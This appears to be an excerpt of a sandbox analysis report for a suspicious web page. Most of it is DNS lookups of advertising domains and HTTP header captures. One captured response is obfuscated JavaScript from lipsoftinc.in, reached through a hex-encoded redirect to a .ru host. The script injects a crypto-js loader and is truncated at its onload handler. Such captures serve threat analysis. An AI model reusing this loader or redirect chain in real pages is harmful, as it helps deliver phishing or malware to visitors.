                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.115139008 CEST1.1.1.1192.168.2.40xd6e9No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.118361950 CEST1.1.1.1192.168.2.40xbd5aNo error (0)hblg.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.509109974 CEST1.1.1.1192.168.2.40xd0ecNo error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.044120073 CEST1.1.1.1192.168.2.40x3253No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.044243097 CEST1.1.1.1192.168.2.40xd10cNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.073393106 CEST1.1.1.1192.168.2.40xda73No error (0)hblg.media.net88.221.124.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.429250956 CEST1.1.1.1192.168.2.40x9d69No error (0)contextual.media.net88.221.168.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.431214094 CEST1.1.1.1192.168.2.40x7142No error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.416441917 CEST1.1.1.1192.168.2.40x71c7No error (0)lg3.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.632654905 CEST1.1.1.1192.168.2.40xdf9bNo error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.632654905 CEST1.1.1.1192.168.2.40xdf9bNo error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.632654905 CEST1.1.1.1192.168.2.40xdf9bNo error (0)dorpat.geo.iponweb.net35.214.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.632663965 CEST1.1.1.1192.168.2.40x3297No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.634692907 CEST1.1.1.1192.168.2.40xcefbNo error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.634692907 CEST1.1.1.1192.168.2.40xcefbNo error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:18.102377892 CEST1.1.1.1192.168.2.40x58No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:18.102652073 CEST1.1.1.1192.168.2.40x5adNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.701420069 CEST1.1.1.1192.168.2.40xa266No error (0)ssc-cms.33across.compixel.33across.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.701420069 CEST1.1.1.1192.168.2.40xa266No error (0)pixel.33across.com67.202.105.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.701420069 CEST1.1.1.1192.168.2.40xa266No error (0)pixel.33across.com67.202.105.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.701931953 CEST1.1.1.1192.168.2.40xa9aaNo error (0)ssc-cms.33across.compixel.33across.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:43.359671116 CEST1.1.1.1192.168.2.40xe7bbNo error (0)de.tynt.com67.202.105.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:43.359671116 CEST1.1.1.1192.168.2.40xe7bbNo error (0)de.tynt.com67.202.105.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:44.028234959 CEST1.1.1.1192.168.2.40x795dNo error (0)hde.tynt.com67.202.105.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:44.028234959 CEST1.1.1.1192.168.2.40x795dNo error (0)hde.tynt.com67.202.105.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.111876965 CEST1.1.1.1192.168.2.40xe803No error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.112432003 CEST1.1.1.1192.168.2.40x17b7No error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.115942955 CEST1.1.1.1192.168.2.40x8e92No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.115942955 CEST1.1.1.1192.168.2.40x8e92No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.116894007 CEST1.1.1.1192.168.2.40xc9fcNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.120558023 CEST1.1.1.1192.168.2.40x7e74No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.120558023 CEST1.1.1.1192.168.2.40x7e74No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.120558023 CEST1.1.1.1192.168.2.40x7e74No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.120558023 CEST1.1.1.1192.168.2.40x7e74No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.120558023 CEST1.1.1.1192.168.2.40x7e74No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.122479916 CEST1.1.1.1192.168.2.40x41a6No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.122479916 CEST1.1.1.1192.168.2.40x41a6No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.122479916 CEST1.1.1.1192.168.2.40x41a6No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.125118971 CEST1.1.1.1192.168.2.40x4b00No error (0)cs.krushmedia.com8.2.110.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.713499069 CEST1.1.1.1192.168.2.40xbb40No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.713649035 CEST1.1.1.1192.168.2.40x8b0fNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.007968903 CEST1.1.1.1192.168.2.40xda14No error (0)gw-iad-bid.ymmobi.comgw-iad-ym.yeahmobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.007968903 CEST1.1.1.1192.168.2.40xda14No error (0)gw-iad-ym.yeahmobi.combid-iad-static.yeahtargeter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.008476973 CEST1.1.1.1192.168.2.40x9ecaNo error (0)gw-iad-bid.ymmobi.comgw-iad-ym.yeahmobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.008476973 CEST1.1.1.1192.168.2.40x9ecaNo error (0)gw-iad-ym.yeahmobi.combid-iad-static.yeahtargeter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.008476973 CEST1.1.1.1192.168.2.40x9ecaNo error (0)bid-iad-static.yeahtargeter.com47.253.61.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.079312086 CEST1.1.1.1192.168.2.40x40cfNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.079585075 CEST1.1.1.1192.168.2.40x996aNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.571858883 CEST1.1.1.1192.168.2.40x4ce7No error (0)events-ssc.33across.com34.117.239.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.040182114 CEST1.1.1.1192.168.2.40x93c0No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.046457052 CEST1.1.1.1192.168.2.40x7759No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.091862917 CEST1.1.1.1192.168.2.40x5f7No error (0)cs.iqzone.com8.2.111.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.111443043 CEST1.1.1.1192.168.2.40xe00dNo error (0)33across-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.125344992 CEST1.1.1.1192.168.2.40xe12aNo error (0)33across-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.510128975 CEST1.1.1.1192.168.2.40x64c8No error (0)events-ssc.33across.com34.117.239.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.775547028 CEST1.1.1.1192.168.2.40x68c4No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.777390003 CEST1.1.1.1192.168.2.40x4d63No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.777390003 CEST1.1.1.1192.168.2.40x4d63No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.777482986 CEST1.1.1.1192.168.2.40xab66No error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.162949085 CEST1.1.1.1192.168.2.40x3d2fNo error (0)pixel-us-east.rubiconproject.compixel-us-east.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.163160086 CEST1.1.1.1192.168.2.40x7c67No error (0)pixel-us-east.rubiconproject.compixel-us-east.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.194999933 CEST1.1.1.1192.168.2.40xde57No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.195141077 CEST1.1.1.1192.168.2.40xb57No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.075162888 CEST1.1.1.1192.168.2.40xc715No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.075162888 CEST1.1.1.1192.168.2.40xc715No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.075162888 CEST1.1.1.1192.168.2.40xc715No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.076462030 CEST1.1.1.1192.168.2.40x7b33No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:54.012294054 CEST1.1.1.1192.168.2.40xfb19No error (0)securepubads.g.doubleclick.net216.58.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:54.012909889 CEST1.1.1.1192.168.2.40xc435No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    0192.168.2.44973069.49.245.1724434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC684OUTGET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yak HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: lipsoftinc.in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC2065INData Raw: 38 30 35 0d 0a 20 20 20 20 76 61 72 20 6a 52 52 47 67 47 71 52 55 4e 74 51 6f 58 44 55 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6a 52 52 47 67 47 71 52 55 4e 74 51 6f 58 44 55 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6a 52 52 47 67 47 71 52 55 4e 74 51 6f 58 44 55 29 3b 0d 0a 6a 52 52 47 67 47 71 52 55 4e 74 51 6f 58 44 55 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 805 var jRRGgGqRUNtQoXDU = document.createElement("script");jRRGgGqRUNtQoXDU.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(jRRGgGqRUNtQoXDU);jRRGgGqRUNtQoXDU.onload=function()


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1192.168.2.449737104.17.24.144434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC950INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Sat, 20 Sep 2025 17:20:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IxedqX1bR4m9kW6ohywiBBEjPoIu3IK8ojDb8b6PBI63khbTNANw1kDBfIkxVuY6xeflMPV7bMCmsw9ow4sW79TIxLmffD2M9a0aJIz5CHA6MHhCQAkmhBw9o1RxC8r72awh4oUI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2051e0843e0-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:18 UTC419INData Raw: 33 39 37 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 397e!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
